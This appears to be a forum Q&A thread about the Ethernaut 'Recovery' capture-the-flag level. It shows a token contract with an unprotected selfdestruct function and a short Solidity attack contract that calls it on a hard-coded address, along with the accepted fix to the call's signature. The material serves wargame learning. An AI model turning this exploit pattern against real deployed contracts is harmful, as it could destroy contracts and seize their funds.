# Calling function from another contract using call method

Tags: transactions, blockchain, solidity, smartcontracts, remix

I am doing ethernaut Recovery CTF. For that I have to call the '''destroy''' function in another contract. I am doing it will the help of '''call''' in solidity. But the transaction is getting reverted.

**Contract to be attacked**

```
contract SimpleToken {

  using SafeMath for uint256;
  // public variables
  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) public {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value.mul(10);
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public { 
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender].sub(_amount);
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}
```

**Attack Contract**

```
//SPDX-License-Identifier:MIT
pragma solidity ^0.8.0;

contract recovery_solution{
    address victim = 0x0EB8e4771ABA41B70d0cb6770e04086E5aee5aB2;

    function destroy1(address _to) public{
        (bool success, ) = victim.call(abi.encodeWithSignature("destroy(address payable)", _to));
        require(success, "Transaction failed");
    }
}
```

Can someone please tell what's wrong with my attack code?

Answer (score 0, accepted):

`address payable` type is represented simply as `address` in the function signature.

```
victim.call(abi.encodeWithSignature("destroy(address)", _to));
```

Docs: https://docs.soliditylang.org/en/v0.8.17/abi-spec.html#mapping-solidity-to-abi-types

Comment: Still it's not working

Comment: @MukundAgrawal Please provide steps to reproduce your issue. I was able to successfullly call the `destroy()` function through the `recovery_solution` contract in the Remix IDE emulator - https://imgur.com/Gi15kw2

Comment: @MukundAgrawal Great. Please consider sharing the solution - what have you changed, what happened between "it doesn't work" and "it works" - so that others with the same issue can also find the solution.